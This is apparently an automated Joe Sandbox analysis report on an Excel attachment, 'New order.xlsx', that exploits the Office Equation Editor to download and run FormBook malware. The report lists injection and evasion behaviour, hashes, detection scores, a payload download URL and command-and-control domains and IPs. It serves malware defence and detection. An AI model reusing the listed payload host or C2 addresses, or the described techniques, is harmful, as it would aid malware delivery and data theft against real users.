        Execution: Scripting (1); Native API (11); Shared Modules (1); Exploitation for Client Execution (23); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
        Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
        Privilege Escalation: Access Token Manipulation (1); Process Injection (612); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
        Defense Evasion: Deobfuscate/Decode Files or Information (1); Scripting (1); Obfuscated Files or Information (3); Software Packing (1); Rootkit (1); Masquerading (111); Virtualization/Sandbox Evasion (2); Access Token Manipulation (1); Process Injection (612)
        Credential Access: Credential API Hooking (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
        Discovery: System Time Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (251); Virtualization/Sandbox Evasion (2); Process Discovery (2); Remote System Discovery (1); Network Service Scanning; System Network Connections Discovery
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
        Collection: Archive Collected Data (1); Credential API Hooking (1); Clipboard Data (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
        Command and Control: Ingress Tool Transfer (33); Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (122); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
        Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
        Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
        Imp​act: System Shutdown/Reboot (1); Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
        Behavior Graph

        Behavior Graph ID: 626188  Sample: New order.xlsx  Start date: 13/05/2022  Architecture: WINDOWS  Score: 100

        Sample-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures

        Process tree (bracketed figures are the created-file/registry counters drawn on the graph nodes):

        EQNEDT32.EXE [12]
            network: 104.168.33.25:80 (local port 49171), AS-COLOCROSSINGUS, United States
            dropped: C:\Users\user\AppData\Local\...\vbc[1].exe (PE32)
            dropped: C:\Users\Public\vbc.exe (PE32)
            signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            started: vbc.exe [19]
                dropped: C:\Users\user\AppData\Local\...\fdvucso.exe (PE32)
                signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                started: fdvucso.exe
                    signatures: Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
                    started: fdvucso.exe
                        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                        injected: explorer.exe
                            network: www.xinli-ac.com 154.222.70.249:80 (local port 49172), XIAOZHIYUN1-AS-APICIDCNETWORKUS, Seychelles; www.insurancecentral.info
                            signatures: System process connects to network (likely due to code injection or exploit)
                            started: svchost.exe
                                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                                started: cmd.exe
        EXCEL.EXE [34 26]
            dropped: C:\Users\user\Desktop\~$New order.xlsx (data)

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample
        Source | Detection | Scanner | Label
        New order.xlsx | 40% | Virustotal |
        New order.xlsx | 34% | ReversingLabs | Document-OLE.Exploit.CVE-2017-11882

        Dropped Files
        Source | Detection | Scanner | Label
        C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 37% | ReversingLabs | Win32.Trojan.FormBook
        C:\Users\Public\vbc.exe | 37% | ReversingLabs | Win32.Trojan.FormBook

        Unpacked PE Files
        Source | Detection | Scanner | Label
        6.0.fdvucso.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
        5.2.fdvucso.exe.120000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
        6.0.fdvucso.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
        6.0.fdvucso.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
        6.2.fdvucso.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

        Domains
        Source | Detection | Scanner | Label
        www.insurancecentral.info | 1% | Virustotal |

        URLs
        Source | Detection | Scanner | Label
        www.worklifefirewalls.com/m9y5/ | 1% | Virustotal |
        www.worklifefirewalls.com/m9y5/ | 0% | Avira URL Cloud | safe
        http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
        http://104.168.33.25/gtb/vbc.exe | 13% | Virustotal |
        http://104.168.33.25/gtb/vbc.exe | 100% | Avira URL Cloud | malware
        http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
        http://www.mozilla.com0 | 0% | URL Reputation | safe
        http://www.xinli-ac.com/m9y5/?3f=ylBe/k3Uhk7dBIeXI//KFRH0TaC7pxYziRrYgQ8MI5uD9iOXGI4rYw0cjZ+4cEk1rP/qTw==&-Z=f4l0drr | 0% | Avira URL Cloud | safe
        http://104.168.33.25/gtb/vbc.exehhC: | 0% | Avira URL Cloud | safe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
        http://treyresearch.net | 0% | URL Reputation | safe
        http://104.168.33.25/gtb/vbc.exej | 0% | Avira URL Cloud | safe
        http://java.sun.com | 0% | URL Reputation | safe
        http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
        http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
        http://www.%s.comPA | 0% | URL Reputation | safe
        http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
        Domains and IPs

        Contacted Domains
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        www.xinli-ac.com | 154.222.70.249 | true | true | | unknown
        www.insurancecentral.info | unknown | unknown | true | | unknown

        Contacted URLs
        Name | Malicious | Antivirus Detection | Reputation
        www.worklifefirewalls.com/m9y5/ | true | 1% Virustotal; Avira URL Cloud: safe | low
        http://104.168.33.25/gtb/vbc.exe | true | 13% Virustotal; Avira URL Cloud: malware | unknown
        http://www.xinli-ac.com/m9y5/?3f=ylBe/k3Uhk7dBIeXI//KFRH0TaC7pxYziRrYgQ8MI5uD9iOXGI4rYw0cjZ+4cEk1rP/qTw==&-Z=f4l0drr | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://investor.msn.com | explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.iis.fhg.de/audioPA | explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com/ccleanerq | explorer.exe, 00000007.00000000.1050559717.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019814122.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004615683.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992542708.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.mozilla.com0 | explorer.exe, 00000007.00000000.998621484.00000000077C9000.00000004.00000010.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com/ccleaner1SPS0 | explorer.exe, 00000007.00000000.1025885348.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999748239.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014603671.0000000008617000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://104.168.33.25/gtb/vbc.exehhC: | EQNEDT32.EXE, 00000002.00000002.966741326.0000000000554000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | vbc.exe, 00000004.00000000.965645699.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000002.996078709.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr | false | | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://treyresearch.net | explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://104.168.33.25/gtb/vbc.exej | EQNEDT32.EXE, 00000002.00000002.967017696.0000000003660000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://java.sun.com | explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000007.00000000.1049037766.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000007.00000000.999886715.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014689311.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999403275.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.990012033.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014285253.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1002158677.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1025987393.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016145834.00000000003A6000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://investor.msn.com/ | explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://www.piriform.com/ccleaner | explorer.exe, 00000007.00000000.999392147.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014603671.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992542708.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://computername/printers/printername/.printer | explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.%s.comPA | explorer.exe, 00000007.00000000.1049037766.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | low
http://www.autoitscript.com/autoit3 | explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://support.mozilla.org | explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.piriform.com/ccleanerv | explorer.exe, 00000007.00000000.1021455911.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995504335.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006602259.0000000004385000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://servername/isapibackend.dll | explorer.exe, 00000007.00000000.1023300017.0000000006450000.00000002.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | low
IP | Domain | Country | ASN | ASN Name | Malicious
104.168.33.25 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
154.222.70.249 | www.xinli-ac.com | Seychelles | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORKUS | true
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 626188
Start date and time: 2022-05-13 17:19:45 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 35s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: New order.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@11/16@2/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:
                                        • Successful, ratio: 26.8% (good quality ratio 25.2%)
                                        • Quality average: 75%
                                        • Quality standard deviation: 29.1%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .xlsx
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                                        • TCP Packets have been reduced to 100
• Not all processes were analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
17:21:41 | API Interceptor | 105x Sleep call for process: EQNEDT32.EXE modified
17:21:58 | API Interceptor | 36x Sleep call for process: fdvucso.exe modified
17:22:21 | API Interceptor | 204x Sleep call for process: svchost.exe modified
17:22:54 | API Interceptor | 1x Sleep call for process: explorer.exe modified
                                        No context
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category: downloaded
Size (bytes): 277920
Entropy (8bit): 7.911203365939466
Encrypted: false
SSDEEP: 6144:LOtIOb+kdk/PekMHsLKhnbdAnYlqQZvtBA6o3fX:LOLbhdkXekMMLAnbuYlL7BAP
MD5: 69250F55FBFE48822C838B4EEAF33A0A
SHA1: 3E4E1DD9DBEB98EC354F7A03D455A0A38CCEA4E5
SHA-256: 752D0155C769033832D6845EABBA29BCE2B9D0EEDFF734B31A49C879ED08FF72
SHA-512: 8BB1F40992A1E829D7B6CE9751DEC84D849C50BDF72A1BCD8DA9362C8CCA0521729F9031FCF6F19438C147702EB601B31FCEC9EA9E230E2A00B0ED9B679E6AA6
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 37%
Reputation: low
IE Cache URL: http://104.168.33.25/gtb/vbc.exe
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.P............................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...P.....;.....................@..@................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: ms-windows metafont .wmf
Category: dropped
Size (bytes): 4630
Entropy (8bit): 5.070400845866794
Encrypted: false
SSDEEP: 96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
MD5: 1A4FF280B6D51A6ED16C3720AF1CD6EE
SHA1: 277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
SHA-256: E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
SHA-512: 3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
Malicious: false
Reputation: moderate, very likely benign file
                                        Preview:...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: ms-windows metafont .wmf
Category: dropped
Size (bytes): 1970
Entropy (8bit): 5.125773446782967
Encrypted: false
SSDEEP: 48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
MD5: 30935B0D56A69E2E57355F8033ADF98B
SHA1: 5F7C13E36023A1B3B3DAF030291C02631347C2AB
SHA-256: 077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
SHA-512: 5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
Malicious: false
Reputation: moderate, very likely benign file
                                        Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: ms-windows metafont .wmf
Category: dropped
Size (bytes): 4630
Entropy (8bit): 5.070400845866794
Encrypted: false
SSDEEP: 96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
MD5: 1A4FF280B6D51A6ED16C3720AF1CD6EE
SHA1: 277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
SHA-256: E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
SHA-512: 3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
Malicious: false
                                        Preview:...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 223752
Entropy (8bit): 3.2805343869701504
Encrypted: false
SSDEEP: 1536:gAGsM8yOYZWQ99d99H9999999lN6Hz8iiiiiiiiiiiiiiiPnHnbq+QVwtaKfdL4a:gMMVNSztnZft6rMMVNSztnZft6u
MD5: 8E3A74F7AA420B02D34C69E625969C0A
SHA1: 4743F57F0F702C5B47FA1668D9173E08ADA16448
SHA-256: 0CD83C55739629F98FE6AFD3E25A5BCBB346CBEF58BC592C1260E9F0FA8575A9
SHA-512: ADE6B91E260AFA08CC286471D0AD7BCA82FF5E1FE506D48B37A13E3CDD2717171CDAC38C77CFF18FD4C26CA9470B002B63B7FDDC0466FC6F7010A772BF557054
Malicious: false
                                        Preview:....l................................... EMF.....j..........................8...X....................?......F...........GDIC...............p.........8.........................F...........................A. ...........F.......(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: ms-windows metafont .wmf
Category: dropped
Size (bytes): 1970
Entropy (8bit): 5.125773446782967
Encrypted: false
SSDEEP: 48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
MD5: 30935B0D56A69E2E57355F8033ADF98B
SHA1: 5F7C13E36023A1B3B3DAF030291C02631347C2AB
SHA-256: 077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
SHA-512: 5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
Malicious: false
                                        Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...
Process: C:\Users\Public\vbc.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 80384
Entropy (8bit): 6.294173225862387
Encrypted: false
SSDEEP: 1536:jsTaC+v1CUfr0oxAomP3cX/4pi2sWjcdaXI:Ca5wUD1/ui5a4
MD5: 8CA00DF697FFA200C6CA558754C49F37
SHA1: 4A84F286472799A541BFEF17CFC9F746C7B692D3
SHA-256: 3D9400A6D9CA60C3BBE4212BA2727924E086A41CD2634D5CE1C4B8D9EE02F9DD
SHA-512: 1451AC47CF1FD29AF252E75657A99486165404CF891A43E3FB617DCE6C5168AF42D1B0E62EC34E463AE168AFCDF9763107629C1A4DA862760C21232F789538B3
Malicious: true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w...%`..w...%^..w...%a.w......w...w..w..p....w..p.~..w..p....w..Rich.w..................PE..L...a.~b............................7.............@.......................................@..................................$.......p..................................T...............................@............................................text...U........................... ..`.rdata...N.......P..................@..@.data... 1...0......................@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\Public\vbc.exe
File Type: data
Category: dropped
Size (bytes): 189439
Entropy (8bit): 7.9917863154165305
Encrypted: true
SSDEEP: 3072:UMe+HAL1YEIOIaeq6vQwmi25nAQquhWdC8cSiQmjgLzylj/YUhljifyucPqP:E9aVOIaeqlwmDKQqM8cSdvEgUH+fR+O
MD5: BE2AEB25761BA4A8F20FBD04EA588971
SHA1: 95528D502D8DDB7A3ECF3524378876EC08FBD348
SHA-256: 586F3F57F0BA77EE87F999E6AE034375A5BB07D9A6CC95AB9D185EECD933A963
SHA-512: 8AAFDD4E154B8633D311DF4EF929DE4BD9B0F2147CA7582FE10359B8FC6048F4AE815C276589C8AC177C43F55F4015B2336C5CE6CB6FABAA08BE4B2BCA5C91D3
Malicious: false
                                        Preview:]....)8.z.E....{T`Z2Kb.P.....$.Qd.23....)e....a...............W.g%........I..[h..5G.*.a=..(>.....{.....a....,..N.B.1.X.m..8..(}..........9....+.&.ol...x...x. .:.KHy.6..n4.bJOt.w s)...^..4........K.Vjx[.(.?.w.(...).U.....M..N,.c....AY.#.TkD.G.:TPc.K.y)8..x.....G..r2.h....U.!..1QdT23....)X..a....6.........@.$%...jqE.....@...G..W.@.... '"^.!$....V.:....|....X.m..8..7r.....I9p4......W.b.,o.<.y..W..........n4.bJOt.h.....^......R..2.K.Vjx[.(+?{.l%".Z.......M..7.c.d..A.G#.T2D.\.:Tfc.b...y)8.zx.....G...2......U...$.Qd.23....)e....a..............@.$%...jqE.....@...G..W.@.... '"^.!$....V.:....|....X.m..8..7r.....I9p4......W.b.,o.<.y..W..........n4.bJOt.w s)...^M.4..NR.....K.Vjx[.(+?{.l%"..Z.U.....M..7.c.d..A.G#.T2D.\.:Tfc.b...y)8.zx.....G...2......U...$.Qd.23....)e....a..............@.$%...jqE.....@...G..W.@.... '"^.!$....V.:....|....X.m..8..7r.....I9p4......W.b.,o.<.y..W..........n4.bJOt.w s)...^M.4..NR.....K.Vjx[.(+?{.l%"..Z.U.....M..
Process: C:\Users\Public\vbc.exe
File Type: data
Category: dropped
Size (bytes): 281488
Entropy (8bit): 7.6561639892830335
Encrypted: false
SSDEEP: 6144:k9aVOIaeqlwmDKQqM8cSdvEgUH+fR+MwQd:IkOKqlDKxHcWMzGJw2
MD5: C5E6696957D25D8DEC8049B2F737C62D
SHA1: 790E266C7FFAC4588626301B5090B6CA26B15020
SHA-256: 8694698785F5AF0E04B78A6E36103B65A3A50D825B77C1848D4EC35C8A471E36
SHA-512: 0744F7CEF46106D1CA98661B91928AC7C90494D65059EF062EA4A14AE419F2DFD97A84F2C9F6A49F81D1073B19326E849AE38500AA008D006CE34071C1453B6A
Malicious: false
                                        Preview:........,...................A...............................................................................................................................................................................................................................................................G...................j...............................................................................................................................h...........!...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):4797
                                        Entropy (8bit):6.202556793925154
                                        Encrypted:false
                                        SSDEEP:96:oV6T0r9Eo29FYSfUCvAy6gsaW6pAMIVcZ8B0Fs8+u:oV6T0mFYwUKAyBVa1VRWFiu
                                        MD5:69750989332A51572B9E510D66ABBDCF
                                        SHA1:D74C3B8C3280B05B816E89D09C2AE9274403002C
                                        SHA-256:BB4AEE81C87AF317EF9CA3C2C3906B73E748391DEEDBDE1BEDDA841F8147EE44
